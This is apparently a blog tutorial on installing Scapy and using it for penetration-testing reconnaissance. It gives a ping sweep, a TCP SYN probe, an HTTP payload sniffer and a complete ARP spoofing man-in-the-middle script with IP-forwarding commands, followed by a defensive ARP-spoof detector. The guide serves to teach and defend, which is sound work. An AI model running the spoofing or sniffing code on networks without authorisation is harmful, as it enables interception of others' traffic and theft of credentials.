Installing and Using Scapy for Active Reconnaissance in Penetration Testing
Scapy is a powerful Python-based interactive packet manipulation program and library. It is widely used in penetration testing and network analysis due to its flexibility and ease of use. This blog post will guide you through the installation of Scapy on various operating systems and demonstrate its usage in penetration testing with practical examples.
Installation of Scapy
1. Windows:
To install Scapy on Windows, follow these steps:
Install Python: Download and install Python from the official website. Ensure you check the option to add Python to your PATH during installation.
Install Scapy: Open Command Prompt and run:
pip install scapy
2. macOS:
To install Scapy on macOS, follow these steps:
Install Homebrew: If you don’t have Homebrew installed, open Terminal and run:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Install Python: Use Homebrew to install Python:
brew install python
Install Scapy: Finally, install Scapy using pip:
pip install scapy
3. Linux:
To install Scapy on Linux, follow these steps:
Install Python and Pip: Open Terminal and run:
sudo apt-get update
sudo apt-get install python3 python3-pip
Install Scapy: Use pip to install Scapy:
pip3 install scapy
Using Scapy in Penetration Testing
Scapy can be used for various tasks in penetration testing, such as network scanning, packet crafting, and sniffing. Here are some practical examples:
1. Network Scanning:
Scapy can be used to perform network scans to discover active hosts and open ports. Here’s a simple example of a ping sweep to discover active hosts in a subnet:
from scapy.all import *

# Define the subnet
subnet = "192.168.1.0/24"

# Perform the ping sweep: one ICMP echo request per address in the subnet
ans, unans = sr(IP(dst=subnet)/ICMP(), timeout=2)

# Print the results: every host that answered is up
for snd, rcv in ans:
    print(rcv.sprintf(r"%IP.src% is alive"))
2. Packet Crafting:
Scapy allows you to craft custom packets for testing purposes. For example, you can create a TCP SYN packet to test a specific port on a target host:
from scapy.all import *

# Define the target IP and port
target_ip = "192.168.1.10"
target_port = 80

# Craft the TCP SYN packet
syn_packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")

# Send the packet and receive the first response (SYN/ACK for an open port, RST for a closed one)
response = sr1(syn_packet, timeout=2)

# Print the response
if response:
    response.show()
else:
    print("No response received")
3. Packet Sniffing:
Scapy can also be used to sniff network traffic. Here’s an example of how to capture and display HTTP packets:
from scapy.all import *

# Define the BPF capture filter (named bpf_filter so it does not shadow the built-in filter())
bpf_filter = "tcp port 80"

# Define the packet handler function: print the payload of every packet that carries one
def packet_handler(packet):
    if packet.haslayer(Raw):
        print(packet[Raw].load)

# Start sniffing; store=0 keeps captured packets out of memory
sniff(filter=bpf_filter, prn=packet_handler, store=0)
Understanding ARP Spoofing
ARP (Address Resolution Protocol) is used to map IP addresses to MAC addresses. In ARP spoofing, an attacker sends forged ARP messages to a local network, causing devices to associate the attacker’s MAC address with the IP address of another device (such as the gateway). This allows the attacker to intercept, modify, or block traffic.
Setting Up ARP Spoofing
1. Identify Target and Gateway:
First, identify the IP addresses of the target device and the gateway (router). You can use tools like ipconfig (Windows) or ifconfig (Linux/macOS) to find this information.
2. Enable IP Forwarding:
To ensure that the intercepted traffic is forwarded to the actual gateway, enable IP forwarding on your machine:
Windows:
netsh interface ipv4 set interface "Local Area Connection" forwarding=enabled
Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward
macOS:
sysctl -w net.inet.ip.forwarding=1
3. Perform ARP Spoofing:
Here’s a Python script using Scapy to perform ARP spoofing:
from scapy.all import *
import time

# Define the target and gateway IP addresses
target_ip = "192.168.1.5"
gateway_ip = "192.168.1.1"

# Get the MAC address of the target and gateway
def get_mac(ip):
    arp_request = ARP(pdst=ip)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    answered_list = srp(arp_request_broadcast, timeout=5, verbose=False)[0]
    if not answered_list:
        raise RuntimeError(f"No ARP reply from {ip}")
    return answered_list[0][1].hwsrc

target_mac = get_mac(target_ip)
gateway_mac = get_mac(gateway_ip)

# Spoof the target and gateway (hwsrc defaults to this machine's MAC)
def spoof(target_ip, spoof_ip, target_mac):
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    send(packet, verbose=False)

# Restore the network by sending replies with the real MAC address
def restore(target_ip, spoof_ip, target_mac, spoof_mac):
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, hwsrc=spoof_mac)
    send(packet, count=4, verbose=False)

try:
    print("[*] Starting ARP spoofing...")
    while True:
        spoof(target_ip, gateway_ip, target_mac)
        spoof(gateway_ip, target_ip, gateway_mac)
        time.sleep(2)
except KeyboardInterrupt:
    print("[*] Stopping ARP spoofing...")
    restore(target_ip, gateway_ip, target_mac, gateway_mac)
    restore(gateway_ip, target_ip, gateway_mac, target_mac)
    print("[*] Network restored.")
Explanation:
Get MAC Addresses: The get_mac function sends an ARP request to get the MAC address of the target and gateway.
Spoofing: The spoof function sends fake ARP responses to the target and gateway, associating the attacker’s MAC address with the IP addresses of the gateway and target, respectively.
Restoring the Network: The restore function sends correct ARP responses to restore the network to its original state when the attack is stopped.
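The defensive counterpart to the script above is to watch for exactly the symptom it produces: the same IP address suddenly claimed by a different MAC. The following detector is an added example, not part of the original post; it parses raw Ethernet/ARP frames with the standard library so it runs without Scapy, and the MAC addresses and frames it checks are constructed (the IPs are the target and gateway used above). On a live system, the same observe() method can be fed bytes(pkt) from sniff(filter="arp", prn=...).

```python
import struct

ETH_HDR = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")  # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def ip_str(b):
    return ".".join(str(x) for x in b)

def parse_arp(frame):
    """Return (op, sender_mac, sender_ip) from a raw Ethernet frame, or None if it is not ARP."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size or ETH_HDR.unpack_from(frame, 0)[2] != ETHERTYPE_ARP:
        return None
    _, _, _, _, op, sha, spa, _, _ = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    return op, mac_str(sha), ip_str(spa)

class ArpWatch:
    """Remembers the first MAC seen for each sender IP and alerts when a later frame disagrees."""
    def __init__(self):
        self.table = {}  # ip -> first-seen MAC

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        op, mac, ip = parsed
        known = self.table.setdefault(ip, mac)
        if known != mac:
            return f"ALERT: {ip} was {known}, now claimed by {mac} (ARP op={op})"
        return None

def build_arp(op, sha, spa, tha, tpa):
    """Build a constructed ARP frame for testing (not captured traffic)."""
    mac = lambda m: bytes.fromhex(m.replace(":", ""))
    ip = lambda a: bytes(int(x) for x in a.split("."))
    eth = ETH_HDR.pack(mac(tha), mac(sha), ETHERTYPE_ARP)
    return eth + ARP_HDR.pack(1, 0x0800, 6, 4, op, mac(sha), ip(spa), mac(tha), ip(tpa))

def run_demo():
    """Replay a genuine gateway reply, then a forged reply claiming the gateway IP from another MAC."""
    w = ArpWatch()
    frames = [
        build_arp(2, "aa:aa:aa:aa:aa:01", "192.168.1.1", "bb:bb:bb:bb:bb:05", "192.168.1.5"),  # real gateway
        build_arp(2, "cc:cc:cc:cc:cc:99", "192.168.1.1", "bb:bb:bb:bb:bb:05", "192.168.1.5"),  # forged
    ]
    return [alert for alert in (w.observe(f) for f in frames) if alert]
```

A real deployment would seed the table from a trusted inventory (or DHCP leases) rather than trusting the first frame seen, since a spoofer that starts before the monitor would otherwise be recorded as legitimate.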
Conclusion
ARP spoofing with Scapy is a powerful technique for intercepting network traffic. However, it should be used responsibly and only in environments where you have permission to perform such activities. Understanding and practicing these techniques can help you better secure your own networks against similar attacks.